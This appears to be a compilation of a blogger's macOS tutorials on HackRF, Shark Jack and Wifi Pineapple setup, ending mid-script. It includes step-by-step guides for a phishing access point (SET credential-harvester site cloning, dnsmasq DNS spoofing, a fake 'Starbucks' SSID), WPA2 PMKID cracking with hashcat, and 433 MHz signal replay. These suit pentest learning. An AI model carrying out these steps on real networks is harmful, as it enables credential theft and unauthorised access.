Install HackRF One on macOS (Big Sur)

This time it’s about installing the HackRF One binaries on macOS Big Sur. In a later tutorial I will dive deeper into macOS, HackRF One and GNU Radio (gnuradio-companion), but not yet. The installation is done via the latest MacPorts.

Preparation

  • MacPorts installed
  • Command Line Tools installed (SDK 11 or higher)
  • HackRF One connected and started (via USB cable)

CommandLineTools SDK

My first installation failed with an error (even though MacPorts had been freshly installed and the Command Line Tools were installed, too). I looked into the log file and saw an issue with the clang version.

# read log file (optional)
$ cat /opt/local/var/macports/logs/_opt_local_var_macports_sources_rsync.macports.org_macports_release_tarballs_ports_science_hackrf/hackrf/main.log
 …
 clang: error: invalid version number in 'MACOSX_DEPLOYMENT_TARGET=11.0'
 …
 

# show clang version (optional)
$ clang --version

So I looked it up on the Internet and saw that the clang version in the new SDK is higher and will solve this issue. To confirm, I had a look at the installed SDKs.

# list SDKs (optional)
$ ls /Library/Developer/CommandLineTools/SDKs/
MacOSX.sdk MacOSX10.14.sdk MacOSX10.15.sdk
CommandLine Tools 12.3

To be really sure I checked again: yes, the new SDK is installed.

# list SDKs (optional)
$ ls /Library/Developer/CommandLineTools/SDKs/
MacOSX.sdk MacOSX10.14.sdk MacOSX10.15.sdk MacOSX11.1.sdk

# show xcrun configs (optional)
$ xcrun --sdk macosx11.1 --show-sdk-path
$ xcrun --sdk macosx11.1 --show-sdk-version

Installation

After the installation and verification of the new SDK, I tried the MacPorts installation again.

# install hackrf via mac ports
$ sudo port install hackrf
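As an added example (not part of the original post), a small bash wrapper that parses the SDK listing from above and only runs the MacPorts install when an SDK of major version 11 or higher is present. The SDK directory is the one shown in the post; the minimum version and the function names are my own assumptions, and the two sample listings are constructed to mirror the two `ls` outputs above.

```bash
#!/bin/bash
# Added example (not from the original post): check that a macOS SDK with
# major version >= 11 is present before running "sudo port install hackrf".
# SDK_DIR is the path from the post; MIN_MAJOR and the function names are
# my own assumptions.

SDK_DIR="/Library/Developer/CommandLineTools/SDKs"
MIN_MAJOR=11

# highest_sdk_major: read SDK directory names (one per line) on stdin and
# print the highest major version found; the unversioned "MacOSX.sdk" link
# is ignored. Prints 0 if no versioned SDK is present.
highest_sdk_major() {
  best=0
  while IFS= read -r name; do
    case "$name" in
      MacOSX[0-9]*.sdk)
        ver=${name#MacOSX}; ver=${ver%.sdk}
        major=${ver%%.*}
        [ "$major" -gt "$best" ] && best=$major
        ;;
    esac
  done
  echo "$best"
}

# sdk_ok: returns 0 when the listing on stdin contains an SDK >= MIN_MAJOR
sdk_ok() {
  [ "$(highest_sdk_major)" -ge "$MIN_MAJOR" ]
}

# install_hackrf: run the post's install command only if the real SDK
# directory passes the check (macOS only; not called at top level here)
install_hackrf() {
  if ls "$SDK_DIR" | sdk_ok; then
    sudo port install hackrf
  else
    echo "no macOS SDK >= $MIN_MAJOR in $SDK_DIR; update the Command Line Tools first" >&2
    return 1
  fi
}

# Constructed sample listings mirroring the two "ls" outputs in the post
OLD_LISTING='MacOSX.sdk
MacOSX10.14.sdk
MacOSX10.15.sdk'
NEW_LISTING='MacOSX.sdk
MacOSX10.14.sdk
MacOSX10.15.sdk
MacOSX11.1.sdk'

printf '%s\n' "$OLD_LISTING" | sdk_ok && echo "old listing: ok" || echo "old listing: SDK missing"
printf '%s\n' "$NEW_LISTING" | sdk_ok && echo "new listing: ok" || echo "new listing: SDK missing"
```

On a Mac, call `install_hackrf` after sourcing the script; the sample listings only show which decision the check takes for the old and the new Command Line Tools.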

Test installation

This time all went fine and I could start testing the device.

# show USB device info (optional)
$ ioreg -p IOUSB -l -w 0 -b

# show hackrf info
$ hackrf_info

# start debug (optional)
$ hackrf_debug --si5351c -n 0 -r

# start record
$ hackrf_transfer -r myRecord.raw -f 433780000

# start transmit record
$ hackrf_transfer -t myRecord.raw -f 433780000 -x 20

macOS internet connection and service order

Many times I have been asked (directly, via messages or in forums) why the macOS internet connection does not work anymore while using devices like Shark Jack, O.MG Cable and so on. In my tutorials I also did not mention this in detail, because I assumed it should be clear. A big mistake on my side, hence this article. I will now do my best to explain, using a few examples, how to prioritize the services so that you do not lose the internet connection on your macOS. I will use the internet connection via a Wi-Fi hotspot.

Note: I show a specific example for the Shark Jack here, but the main goal is that you understand the principle and can reuse it in other situations.

Network locations

The first part is about macOS network locations. To avoid destroying your current settings, we will create a new network location (all via the command line).

Warning: The following steps will disconnect your internet connection (briefly), because the newly created network location is empty. Read the tutorial carefully before you execute any command!

# list all network locations
$ networksetup -listlocations

# show name of the current location
$ networksetup -getcurrentlocation

# create new location (SharkJackNetwork)
$ networksetup -createlocation SharkJackNetwork

# change location
$ networksetup -switchtolocation SharkJackNetwork

# list network services (should be empty)
$ networksetup -listallnetworkservices

Services

The newly created network location does not contain any service yet. In this second part we create two (Wi-Fi and Bluetooth), set our own DNS servers and test. If you have stored your Wi-Fi credentials (see Keychain Access.app), the internet connection will be established again automatically.

# list all hardware ports with corresponding device name and port
$ networksetup -listallhardwareports

# create Wi-Fi service (named WLAN); the hardware port name must match -listallhardwareports
$ networksetup -createnetworkservice WLAN "Wi-Fi"

# create Bluetooth PAN service (named Bluetooth)
$ networksetup -createnetworkservice Bluetooth "Bluetooth PAN"

# list network services (WLAN and Bluetooth)
$ networksetup -listallnetworkservices

# add dns server (to WLAN)
$ networksetup -setdnsservers WLAN 8.8.8.8 8.8.4.4

# verify DNS settings (optional)
$ dig +all example.com

My MacBook Pro does not provide an RJ45 interface (only USB-C). Therefore I bought a multi-port adapter from Satechi. After plugging it in, I now add this device to my services. There are many other vendors as well; for those, choose your own service name and use the hardware port name shown by -listallhardwareports.

# list all hardware ports with corresponding device name and port
$ networksetup -listallhardwareports

# create adapter service (named Satechi)
$ networksetup -createnetworkservice Satechi "USB 10/100/1000 LAN"

Now it’s time to use the Shark Jack. Turn it on (arming mode), plug it into the adapter, wait for an IP and test. If you haven’t changed it, the default IP is “172.16.24.1”, the user is “root” and the password is “hak5shark”.

# wait for IP
$ ifconfig en8

# run command over SSH
$ ssh -C4 root@172.16.24.1 -C 'pwd'

# ping google dns
$ ping -c 1 google.com

The internet connection is not working anymore, although Wi-Fi seems to be working correctly!

Service order

Now it comes to the order of the services (prioritization). This is where we ensure that the internet connection works again.

# show services in the order they are contacted for a connection
$ networksetup -listnetworkserviceorder

# command to designate the order network services are contacted
$ networksetup -ordernetworkservices WLAN Satechi Bluetooth

# ping google dns
$ ping -c 1 google.com

All good now … The newly created network location (incl. services) can be used whenever you develop your Shark Jack payloads. Depending on your environment, you can create many such network locations and switch between them quickly.
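As an added example (not part of the original post), a bash check for the service order described above: it parses the output of `networksetup -listnetworkserviceorder` and confirms that the service carrying the internet connection (WLAN in this post) is first, so the Shark Jack adapter cannot take over the default route. The sample outputs are constructed to mirror the format macOS prints (disabled services appear as “(*) Name”); the function names are my own.

```bash
#!/bin/bash
# Added example (not from the original post): verify that a given service
# is first in the macOS network service order. Sample outputs below are
# constructed in the format of "networksetup -listnetworkserviceorder";
# function names are my own assumptions.

# Order after creating the services, before -ordernetworkservices
BAD_ORDER='An asterisk (*) denotes that a network service is disabled.
(1) Satechi
(Hardware Port: USB 10/100/1000 LAN, Device: en8)

(2) WLAN
(Hardware Port: Wi-Fi, Device: en0)

(3) Bluetooth
(Hardware Port: Bluetooth PAN, Device: en6)
'
# Order after "networksetup -ordernetworkservices WLAN Satechi Bluetooth"
GOOD_ORDER='An asterisk (*) denotes that a network service is disabled.
(1) WLAN
(Hardware Port: Wi-Fi, Device: en0)

(2) Satechi
(Hardware Port: USB 10/100/1000 LAN, Device: en8)

(3) Bluetooth
(Hardware Port: Bluetooth PAN, Device: en6)
'

# service_names: print enabled service names, one per line, in order.
# Service lines look like "(1) WLAN"; "(*) Name" marks a disabled service
# and is skipped, as are the "(Hardware Port: ...)" detail lines.
service_names() {
  sed -n 's/^([0-9][0-9]*) //p'
}

# first_service: the service macOS contacts first (owner of the default route)
first_service() {
  service_names | head -n 1
}

# check_order EXPECTED: 0 when EXPECTED is first in the listing on stdin
check_order() {
  first=$(first_service)
  if [ "$first" = "$1" ]; then
    echo "OK: $1 is first in the service order"
    return 0
  fi
  echo "WARNING: '$first' is first, not '$1'; fix with: networksetup -ordernetworkservices $1 ..." >&2
  return 1
}

# On macOS run the live check; elsewhere demonstrate on the constructed samples
if command -v networksetup >/dev/null 2>&1; then
  networksetup -listnetworkserviceorder | check_order WLAN || true
else
  printf '%s' "$BAD_ORDER" | check_order WLAN || true
  printf '%s' "$GOOD_ORDER" | check_order WLAN || true
fi
```

Run it after each `-ordernetworkservices` call (or after switching locations); a non-zero exit means another service would be contacted first and the internet connection will break again.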

macOS network locations via gui

First steps with Shark Jack

After you receive your new Shark Jack device from Hak5, you need to upgrade the firmware. This tiny tutorial will guide you through the process. You should plan a maximum of 10 minutes of your life for this action.

Preparation

Enable Arming mode (middle switch position), connect the device to your RJ45 interface and also connect USB-C for charging. Do not stop charging during the whole upgrade process! In case your computer does not provide such an interface, I have had really good experience with the multi-port adapter from Satechi.

Download and install latest Firmware

The default settings for your new Shark Jack are:

  • IP: 172.16.24.1 (Arming mode)
  • User: root
  • Password: hak5shark

Download the latest Shark Jack firmware from the Hak5 Download Center.

# download Firmware (via command line)
$ curl -L -C - https://downloads.hak5.org/api/devices/sharkjack/firmwares/1.1.0-stable -o ~/Downloads/upgrade-1.1.0.bin

# verify SHA256 checksum (optional)
$ shasum -a 256 ~/Downloads/upgrade-1.1.0.bin

# copy Firmware from local to Shark Jack device
$ scp -C4 ~/Downloads/upgrade-1.1.0.bin root@172.16.24.1:/tmp/

# SSH into SharkJack device
$ ssh -C4 root@172.16.24.1

# list directory content (optional)
root@shark:~# ls -la

# show current version
root@shark:~# cat VERSION
1.0

# start update
root@shark:~# sysupgrade -n /tmp/upgrade-1.1.0.bin

Now be patient and do not remove the Shark Jack from the RJ45 port or the USB-C charging cable! The device installs the new firmware and reboots. For me it took around 3 – 4 minutes.

# check interface status (optional)
$ ifconfig

# SSH into Shark Jack device
$ ssh -C4 root@172.16.24.1

# show current version
root@shark:~# cat VERSION
1.1.0

That’s it … have fun and success.

Evil access point on macOS

With just a few steps it is possible to turn the MacBook into an evil access point. The device already has everything that is necessary in terms of hardware. For the additional software only Internet access is required.

Note: The installation and configuration of Kali Linux VM (inside VirtualBox) is not part of this tutorial.

Objectives

Turn the macOS device into a Wi-Fi hotspot with a fake DNS server.

Starting position

My MacBook and my iPhone are connected via cable (USB-C to Lightning). On the iPhone the hotspot (USB tethering) is enabled. The Wi-Fi device is off. Finally there is a Kali Linux VM with SSH access configured.

Step 1: check current local config

Most of the following commands in the first step are optional; only your own IP is important. But they will give you a better understanding of your system.

# show local ip
$ ifconfig en7
[172.20.10.2]

# show system DNS configuration (optional)
$ scutil --dns | grep nameserver

# show network status (optional)
$ netstat -na | grep "\.53"

My interface is en7 and my local IP is 172.20.10.2. For you this can be different! The iPhone (172.20.10.1) is my nameserver (result of scutil) and no service is listening on port 53 (result of netstat).

Step 2: start Kali Linux and clone website

As already mentioned, we are now using the Kali Linux VM. The only important point for the VM configuration is that the network interface is in “Bridged Network” mode.

# list all VMs
$ VBoxManage list vms

# start headless specific vm
$ VBoxManage startvm --type headless "KaliLinux"

# show running VMs (optional)
$ VBoxManage list runningvms

# get IP of vm
$ VBoxManage guestproperty get "KaliLinux" "/VirtualBox/GuestInfo/Net/0/V4/IP"
[172.20.10.3]

# SSH into VM
$ ssh <user>@172.20.10.3

Inside Kali Linux we use the Social-Engineer Toolkit (SET) to quickly clone a website.

# start setoolkit
$ sudo setoolkit

# select Social-Engineering Attacks
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About

set> 1

# select Website Attack Vectors
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules

set> 2

# select Credential Harvester Attack Method
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method

set:webattack> 3

# select Site Cloner
1) Web Templates
2) Site Cloner
3) Custom Import

set:webattack> 2

After entering the IP (IP of the VM) and the domain (URL to clone), open another tab (CMD + t) in your terminal. You can check the cloning result in your browser.

Step 3: clone, build, and run dnsmasq

Now dnsmasq is needed. You can install it via brew or download and compile it yourself.

# clone latest git repository
$ git clone git://thekelleys.org.uk/dnsmasq.git

# change into cloned directory
$ cd dnsmasq

# build dnsmasq binary
$ make

# show help for dnsmasq
$ sudo ./src/dnsmasq --help

# run dnsmasq
$ sudo ./src/dnsmasq --no-dhcp-interface= --no-daemon --log-queries --no-hosts --no-resolv --no-poll --server=8.8.8.8 --address="/example.com/172.20.10.3"

Dnsmasq runs without the DHCP service and without reading /etc/hosts and /etc/resolv.conf. Google’s IP is given as the upstream DNS server.

Step 4: test your DNS

Again, open another tab (CMD + t) in your terminal. Now you can verify the dnsmasq configuration.

# flush local DNS
$ sudo killall -HUP mDNSResponder

# dig on local IP
$ dig @172.20.10.2 +short example.com

# dig on localhost
$ dig @localhost +all example.com

# nslookup on local
$ nslookup login.example.com 172.20.10.2

Step 5: create access point

Set the DNS server for the Wi-Fi service and then start the hotspot.

# set DNS server
$ networksetup -setdnsservers Wi-Fi 172.20.10.2

My favorite SSID: Starbucks

macOS hotspot Starbucks

Now it’s time to wait… In the meantime, you can find out more about your connected STAs.

# show STA information (optional)
$ cat /private/var/db/dhcpd_leases

Share internet from macOS to Wifi Pineapple (Part 2)

Some weeks ago I wrote the first part about Internet Sharing. There we changed the network configuration on the Wifi Pineapple itself. This time we tweak the macOS network configuration (NAT subnet settings) so that we can use Internet Sharing inside the “172.16.42.x” network.

Objectives

Configure Internet Sharing without changing the default settings on Wifi Pineapple (but change defaults on macOS).

Step 1: Prepare for next steps

If you have “Internet Sharing” enabled, now you must switch it off!

Turn on the Wifi Pineapple device and connect it via USB (A plug for NANO, ETH plug for TETRA) to your Mac. If everything works fine, the following commands should run successfully.

# ping device (optional)
$ ping -c 1 172.16.42.1

# show wifi pineapple network settings (optional)
$ ssh root@172.16.42.1 -C 'uci show network'

# start browser session (optional)
$ open http://172.16.42.1:1471

Step 2: Configure default subnet

The property list (com.apple.nat.plist) is like a contract between the “Sharing” preferences pane and “InternetSharing”. One important property to set there is “SharingNetworkNumberStart” (all other properties that follow in this tutorial are optional). This property controls the behavior of InternetSharing when it configures IP addresses for the local interfaces. I chose the value 172.16.42.10.

# read the property list (optional)
$ defaults read /Library/Preferences/SystemConfiguration/com.apple.nat.plist

# create backup of the property list file (optional)
$ sudo cp /Library/Preferences/SystemConfiguration/com.apple.nat.plist /Library/Preferences/SystemConfiguration/com.apple.nat.plist.bak

# add start IP
$ sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.nat NAT -dict-add SharingNetworkNumberStart 172.16.42.10

# add end IP (optional)
$ sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.nat NAT -dict-add SharingNetworkNumberEnd 172.16.42.100

# add network mask (optional)
$ sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.nat NAT -dict-add SharingNetworkMask 255.255.255.0
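As an added example (not part of the original post), a bash sanity check for the three NAT values before they are written into com.apple.nat.plist: start and end must lie in the subnet given by the mask, start must not be above end, and the range must sit in the Pineapple’s subnet without containing the Pineapple’s own address (172.16.42.1 from the post). These rules and the function names are my own assumptions; `write_nat_plist` wraps the three `defaults write` commands above and is only executed after the check passes.

```bash
#!/bin/bash
# Added example (not from the original post): validate the InternetSharing
# NAT range before writing com.apple.nat.plist. PINEAPPLE_IP and the plist
# path are from the post; the checks and function names are my own.

PINEAPPLE_IP="172.16.42.1"
NAT_PLIST="/Library/Preferences/SystemConfiguration/com.apple.nat"

# ip_to_int A.B.C.D: dotted quad to a 32-bit integer
ip_to_int() {
  a=${1%%.*}; rest=${1#*.}
  b=${rest%%.*}; rest=${rest#*.}
  c=${rest%%.*}; d=${rest#*.}
  echo $(( (a << 24) | (b << 16) | (c << 8) | d ))
}

# same_subnet IP1 IP2 MASK: 0 when both addresses share the masked prefix
same_subnet() {
  m=$(ip_to_int "$3")
  [ $(( $(ip_to_int "$1") & m )) -eq $(( $(ip_to_int "$2") & m )) ]
}

# check_nat_range START END MASK: 0 when the range is usable next to the Pineapple
check_nat_range() {
  start=$1; end=$2; mask=$3
  same_subnet "$start" "$end" "$mask" \
    || { echo "start and end are not in one subnet" >&2; return 1; }
  same_subnet "$start" "$PINEAPPLE_IP" "$mask" \
    || { echo "range is not in the Pineapple subnet ($PINEAPPLE_IP)" >&2; return 1; }
  s=$(ip_to_int "$start"); e=$(ip_to_int "$end"); p=$(ip_to_int "$PINEAPPLE_IP")
  [ "$s" -le "$e" ] || { echo "start is above end" >&2; return 1; }
  if [ "$p" -ge "$s" ] && [ "$p" -le "$e" ]; then
    echo "range contains the Pineapple address $PINEAPPLE_IP" >&2
    return 1
  fi
  echo "OK: $start - $end / $mask"
}

# write_nat_plist START END MASK: the post's three "defaults write" calls,
# run only after the range passes the check (macOS only, needs sudo)
write_nat_plist() {
  check_nat_range "$1" "$2" "$3" || return 1
  sudo defaults write "$NAT_PLIST" NAT -dict-add SharingNetworkNumberStart "$1"
  sudo defaults write "$NAT_PLIST" NAT -dict-add SharingNetworkNumberEnd "$2"
  sudo defaults write "$NAT_PLIST" NAT -dict-add SharingNetworkMask "$3"
}

# The values from the post, and a deliberately bad range for comparison
check_nat_range 172.16.42.10 172.16.42.100 255.255.255.0
check_nat_range 172.16.42.0 172.16.42.100 255.255.255.0 || true
```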

Step 3: Network configuration

We will deal with two local interfaces (enX and bridge100). First we configure the “enX” IP. We do this simply via “Network” preferences. Depending on your Wifi Pineapple device you should see one of the following services:

  • NANO: AX88x72A
  • TETRA: USB 10/100 LAN

Select the service and configure it as in the picture.

macOS - Wifi Pineapple IP configuration

Now change the network service order.

macOS - Wifi Pineapple network service order

After saving, we quickly check everything.

# check interface (in my case it's en5)
$ ifconfig en5
...
inet 172.16.42.10 netmask 0xffffff00 broadcast 172.16.42.255

# ping from wifi pineapple (should not work yet)
$ ssh root@172.16.42.1 -C 'ping -c 1 google.com'
...
ping: sendto: Network unreachable

# check for interface (should not exist)
$ ifconfig bridge100
...
ifconfig: interface bridge100 does not exist

Step 4: Start Internet Sharing

Inside “System Preferences”, click “Sharing”, then select “Internet Sharing”. Configure it as in the picture.

macOS - Wifi Pineapple internet share

Step 5: Set bridge100 interface IP

Back in the terminal, the interface “bridge100” should now be visible. We assign the IP 172.16.42.42 to this interface.

# show interface information (optional)
$ ifconfig bridge100

# add IP to bridge100 interface
$ sudo ifconfig bridge100 172.16.42.42 netmask 255.255.255.0 up

That’s it already! You can verify via “Bulletins”.

Wifi Pineapple Dashboard

BTW … Take a look at the following local files, with and without Internet sharing!

# read config file for DHCP
$ defaults read /etc/bootpd.plist

# read internet share config (optional)
$ defaults read /System/Library/LaunchDaemons/com.apple.NetworkSharing.plist

Crack WPA2 with PMKID on macOS

With very little effort and a few tools, you can crack WPA2 Wi-Fi passwords on your macOS. This tutorial will show you how to do it. Bettercap, hcxpcaptool (via Docker) and hashcat are used for this. Please note that these instructions are for learning purposes only!

Precondition

Bettercap

To install Bettercap on macOS you first need to install libusb. Therefore download the latest version of libusb and follow the next steps (after unzipping).

# change directory
$ cd ~/Downloads/libusb-1.0.23

# execute configure script
$ ./configure

# build the binary
$ make

# install binary
$ make install

# change directory & delete
$ cd ~ && rm -fr ~/Downloads/libusb-1.0.23

Now download the precompiled Bettercap binary, extract the ZIP and follow the next steps.

# move binary
$ sudo mv ~/Downloads/bettercap_darwin_amd64_v2.27.1/bettercap /usr/local/bin

# change permissions
$ sudo chmod +x /usr/local/bin/bettercap

# running bettercap updates
$ sudo bettercap -eval "caplets.update; ui.update; q"

# start bettercap with UI caplet
$ sudo bettercap -caplet http-ui

Note: In this guide we don’t change the default credentials (user, pass). You can do so in the file “/usr/local/share/bettercap/caplets/http-ui.cap”!

Open the browser (http://127.0.0.1:80), log in and start Wi-Fi discovery (wifi.recon on). Send some association requests to the selected BSSID (wifi.assoc BSSID). In your home folder you should then find the file “bettercap-wifi-handshakes.pcap”.

Bettercap web UI associate with BSSID

Finish your Bettercap session when you are done.

Wireshark

Optionally you can use Wireshark to verify whether you recorded a PMKID in the Robust Security Network (RSN) information element. Start Wireshark, open the file “bettercap-wifi-handshakes.pcap”, add the filter “eapol && wlan.rsn.ie.pmkid” and look for the PMKID(s).

Wireshark RSN PMKID

hcxpcaptool

Now you need to convert (extract) the PMKID(s) from the Bettercap pcap file. For this you need “hcxpcaptool” (part of hcxtools by ZerBea). Because OpenSSL is needed (and I don’t want to install it), I created a small Alpine Docker image (Dockerfile). You can follow the next steps for usage.

# pull the image
$ docker pull slorenz/hcxpcaptool

# create directories
$ mkdir -p ~/Projects/PMKID/cap

# change directory
$ cd ~/Projects/PMKID/

# copy pcap into cap directory
$ cp ~/bettercap-wifi-handshakes.pcap ~/Projects/PMKID/cap/

# run container
$ docker run -ti --rm --mount src="$(pwd)/cap",target=/hcxpcaptool,type=bind slorenz/hcxpcaptool bettercap-wifi-handshakes.pcap

# show content (optional)
$ cat cap/pmkid.16800

Note: The columns (of the pmkid.16800 content) are separated by * into the following:

  • PMKID
  • MAC AP
  • MAC Station
  • ESSID

If you do not have four columns, you need to repeat all previous steps (recording and converting)!
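As an added example (not part of the original post), a bash validator for the pmkid.16800 format described above: every line must have the four “*”-separated columns, the PMKID and the two MAC addresses must be hex of the right length, and the hex-encoded ESSID is decoded so you can confirm that the capture belongs to your own network before going on. The sample lines are constructed (not real captures) and the function names are my own.

```bash
#!/bin/bash
# Added example (not from the original post): check the four-column
# pmkid.16800 format (PMKID*AP MAC*station MAC*hex ESSID) and decode the
# ESSID. SAMPLE_16800 is constructed; function names are my own.

# Line 1 is well-formed, line 2 lacks the ESSID column, line 3 has a bad PMKID
SAMPLE_16800='0123456789abcdef0123456789abcdef*aabbccddeeff*112233445566*4d79486f6d6557696669
0123456789abcdef0123456789abcdef*aabbccddeeff*112233445566
notahexvalue*aabbccddeeff*112233445566*4d79486f6d6557696669'

# is_hex_len STRING N: 0 when STRING is exactly N hex characters
is_hex_len() {
  printf '%s' "$1" | grep -Eq "^[0-9a-fA-F]{$2}\$"
}

# is_hex_even STRING: 0 when STRING is a non-empty, even-length hex string
is_hex_even() {
  printf '%s' "$1" | grep -Eq '^([0-9a-fA-F]{2})+$'
}

# hex_to_ascii HEX: decode a hex string two characters at a time (POSIX sh
# only: each byte is emitted through an octal printf escape)
hex_to_ascii() {
  h=$1; out=""
  while [ -n "$h" ]; do
    pair=${h%"${h#??}"}
    h=${h#??}
    out="$out$(printf "\\$(printf '%03o' $((0x$pair)))")"
  done
  printf '%s' "$out"
}

# check_16800_line LINE: 0 when the line has the four valid columns
check_16800_line() {
  line=$1
  stars=$(printf '%s' "$line" | tr -cd '*' | wc -c)
  cols=$(( stars + 1 ))
  [ "$cols" -eq 4 ] || { echo "BAD: expected 4 columns, got $cols: $line" >&2; return 1; }
  pmkid=${line%%\**}; rest=${line#*\*}
  ap=${rest%%\**};    rest=${rest#*\*}
  sta=${rest%%\**};   essid_hex=${rest#*\*}
  is_hex_len "$pmkid" 32 || { echo "BAD: PMKID is not 32 hex chars: $pmkid" >&2; return 1; }
  is_hex_len "$ap" 12    || { echo "BAD: AP MAC is not 12 hex chars: $ap" >&2; return 1; }
  is_hex_len "$sta" 12   || { echo "BAD: station MAC is not 12 hex chars: $sta" >&2; return 1; }
  is_hex_even "$essid_hex" || { echo "BAD: ESSID is not hex: $essid_hex" >&2; return 1; }
  echo "OK: AP=$ap STA=$sta ESSID=$(hex_to_ascii "$essid_hex")"
}

# check_16800_file: validate every non-empty line on stdin; 0 only if all pass
check_16800_file() {
  ok=0; bad=0
  while IFS= read -r l; do
    [ -n "$l" ] || continue
    if check_16800_line "$l"; then ok=$((ok + 1)); else bad=$((bad + 1)); fi
  done
  echo "valid lines: $ok, invalid lines: $bad"
  [ "$bad" -eq 0 ]
}

printf '%s\n' "$SAMPLE_16800" | check_16800_file || true
```

Use it as `check_16800_file < cap/pmkid.16800`; a non-zero exit means at least one line is malformed and, as the post says, the recording and conversion have to be repeated.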

hashcat

That was actually the easy part. Now we use Hashcat to crack the WPA2 passwords. The “only” challenge is the password length and the characters used. The next steps will guide you:

# create directory
$ mkdir -p ~/Projects

# change directory
$ cd ~/Projects

# clone git repository of hashcat
$ git clone https://github.com/hashcat/hashcat.git

# build binary
$ make -C hashcat/

# install binary
$ sudo make install -C hashcat/

# delete cloned repository (optional)
$ rm -fr ~/Projects/hashcat

# show hashcat help (optional)
$ hashcat -h

# run benchmark (optional)
$ hashcat -b

# execute hashcat
$ hashcat -m 16800 pmkid.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

That’s it … have fun and success!

Share internet from macOS to Wifi Pineapple

I have been using the Wifi Pineapple Nano by Hak5 for a long time. What can I say – a very, very cool tiny device. Since I am also a macOS user, I would like to show in this tutorial how I share my internet (Wi-Fi to USB). There are various options, but with this one I have achieved the best results so far.

Important: You should carry out all firmware upgrades beforehand, since the settings (which I will show you soon) would otherwise be overwritten again.

Objectives

I would like to connect my MacBook to the Internet via Wi-Fi and then make it available to the Wifi Pineapple via USB. Both devices should be able to use the Internet without network conflicts.

Change Wifi Pineapple network

# show interface configuration (optional)
$ ifconfig

# connect to Pineapple device via SSH
$ ssh root@172.16.42.1

# backup network file
$ cp /etc/config/network /etc/config/network.bak

# show all settings (optional)
$ uci show

# show network settings (optional)
$ uci show network

# change ip with UCI configuration tool
$ uci set network.lan.ipaddr='192.168.2.10'

# change gateway with UCI configuration tool
$ uci set network.lan.gateway='192.168.2.1'

# save changes
$ uci commit

# reboot device
$ reboot

The first steps of the configuration have been carried out. However, you still cannot connect to the device or share the internet!

Modify macOS network configuration

Now you have to configure the macOS network service for the Pineapple as “DHCP with manual address” using the IP 192.168.2.1 (the network.lan.gateway set above). To do this, open the network settings and select the Wifi Pineapple (AX88x72A). Select “DHCP with manual address” in the dropdown (next to Configure IPv4) and assign the IP.

Configure device as DHCP with manual address.

You should also change the order of your available network connections (devices). Click the gear icon and select “Set Service Order”. At the top should be the standard Wi-Fi, followed by the Wifi Pineapple.

set service order

After a short time, the settings should have been accepted.

Wifi to USB internet sharing

Now we are making the internet available from Wifi to Wifi Pineapple (USB). Launch Internet Sharing under System Preferences. On “Share your connection from” select the Wifi and on “To computers using” select the Wifi Pineapple.

share internet from Wifi to USB

Done … let’s verify all configurations.

# show interface configuration (optional)
$ ifconfig

# connect to Pineapple via SSH
$ ssh root@192.168.2.10

# run simple ping (optional)
$ ping -c 1 google.com

# exit SSH connection to Pineapple
$ exit

# open browser
$ open http://192.168.2.10:1471

Note: The Browser URL is now http://192.168.2.10:1471 (network.lan.ipaddr 192.168.2.10)!

After login you can go to the Dashboard and check “Bulletins” which should show the latest news from wifipineapple.com.

M3U8 download app for MacOS

Usually I work via the Terminal, but sometimes I don’t remember all parameters of a binary and searching for them takes time. I had the same issue with ffmpeg downloads of M3U8 files. So I created a small AppleScript (for some dialogs) and saved it as a very simple application. I use it regularly now and thought I would share it here.

Preparation

A little preparation is needed; if you already have the ffmpeg binary installed you can skip to the next section. Download the ffmpeg binary as an archive from https://www.ffmpeg.org/, unzip it and follow the next commands. In my example the binary was unzipped into the “Downloads” folder.

# move ffmpeg binary
$ mv ~/Downloads/ffmpeg /usr/local/bin/ffmpeg

# set permissions
$ chmod +x /usr/local/bin/ffmpeg

# check version (optional)
$ ffmpeg -version

Apple Script

Open the Script Editor and paste the following script there.

#!/usr/bin/osascript

global theURL
global theOutputFolder
global theOutputFileName

on SetURL()
  set theTitle to "Video URL"

  try
    set theURLDialog to display dialog "What's the file URL?" default answer "" with title theTitle buttons {"Continue"}
    set theURL to text returned of theURLDialog
  on error
    quit
  end try

  if theURL as string is equal to "" then
    quit
  end if
end SetURL

on SetOutputFolder()
  try
    set theOutputFolder to choose folder with prompt "In what folder you will save the file?"
  on error
    quit
  end try
end SetOutputFolder

on SetOutputFileName()
  set theTitle to "File Name"

  try
    set theOutputFileNameDialog to display dialog "What's your target file name?" default answer "" with title theTitle buttons {"Continue"}
    set theOutputFileName to text returned of theOutputFileNameDialog
  on error
    quit
  end try

  if theOutputFileName as string is equal to "" then
    quit
  end if
end SetOutputFileName

on RunTerminal()
  -- the POSIX path of the chosen folder already ends with "/"
  set theTargetPath to POSIX path of theOutputFolder & theOutputFileName
  -- "quoted form of" shell-quotes the URL and the path, so spaces or shell
  -- metacharacters in either cannot be interpreted by the shell
  set theCommand to "ffmpeg -i " & quoted form of theURL & " -c copy -bsf:a aac_adtstoasc " & quoted form of theTargetPath

  tell application "Terminal"
    activate
    do script theCommand in window 1
  end tell
end RunTerminal

on quit
  display dialog "Thanks for trying this!" buttons {"Continue"}
  continue quit
end quit

on run
  SetURL()
  SetOutputFolder()
  SetOutputFileName()

  RunTerminal()
end run
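As an added example (not part of the original post), a bash counterpart to the script’s RunTerminal() handler: it checks that the entered URL is an http(s) M3U8 URL without whitespace, quotes or redirection characters, and then passes the URL and the output path to ffmpeg as separate arguments, so nothing typed into the dialog can ever be interpreted by the shell. The function names and the sample inputs are my own.

```bash
#!/bin/bash
# Added example (not from the original post): validate an M3U8 URL and
# call ffmpeg with the post's options, passing each value as its own
# argument. Function names and sample inputs are my own.

# Allowed: http or https, no whitespace/quotes/backticks/redirections,
# a ".m3u8" path with an optional query string
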